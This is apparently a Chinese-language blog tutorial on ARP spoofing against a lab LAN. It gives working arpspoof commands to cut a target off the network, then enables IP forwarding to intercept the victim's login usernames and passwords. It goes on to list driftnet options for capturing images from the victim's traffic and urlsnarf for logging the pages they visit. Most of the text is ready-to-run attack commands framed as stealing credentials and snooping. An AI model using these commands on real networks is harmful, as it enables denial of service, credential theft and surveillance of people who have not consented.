断网攻击:
首先我们需要知道攻击的目标ip及网关和我们攻击者的ip及网卡
本例中,目标IP:192.168.147.130 目标网关:192.168.147.2
本机IP:192.168.147.132 本机网卡:eth0
攻击前,先查看目标主机是否能联通互联网。经查看:可以
打开中断,输入以下命令进行断网攻击
arpspoof -i 本机网卡 -t 目标ip 目标网关
本例中命令为:arpspoof -i eth0 -t 192.168.147.130 192.168.147.2
攻击成功!
欺骗攻击(密码劫持)
同样我们也需要知道目标IP、目标网关、本机网卡、本机IP。
此例依旧使用上述目标及本机
打开终端输入命令:
echo 1 > /proc/sys/net/ipv4/ip_forward
使目标IP不断网
cat /proc/sys/net/ipv4/ip_forward
检查上述命令是否被执行,若返回1则说明命令已被执行
arpspoof -i 本机网卡 -t 目标IP 目标网关
在本例中,命令应为:
arpspoof -i eth0 -t 192.168.147.130 192.168.147.2
另起终端,用来接收劫持(盗取的信息)
随意登陆一个网站,可发现用户名及密码已被劫持。
可以看到用户名为123,而密码为一串编码,这是因为网站对密码加密的缘故,可通过解密手段对编码进行解码
主要参数:
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
使用举例:
1.实时监听: driftnet -i wlan0
2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
再打开一个终端,输入urlsnarf -i wlan0 监听浏览过的网页日志,等待获取
再打开一个终端,输入wireshark ,进行抓包
网友评论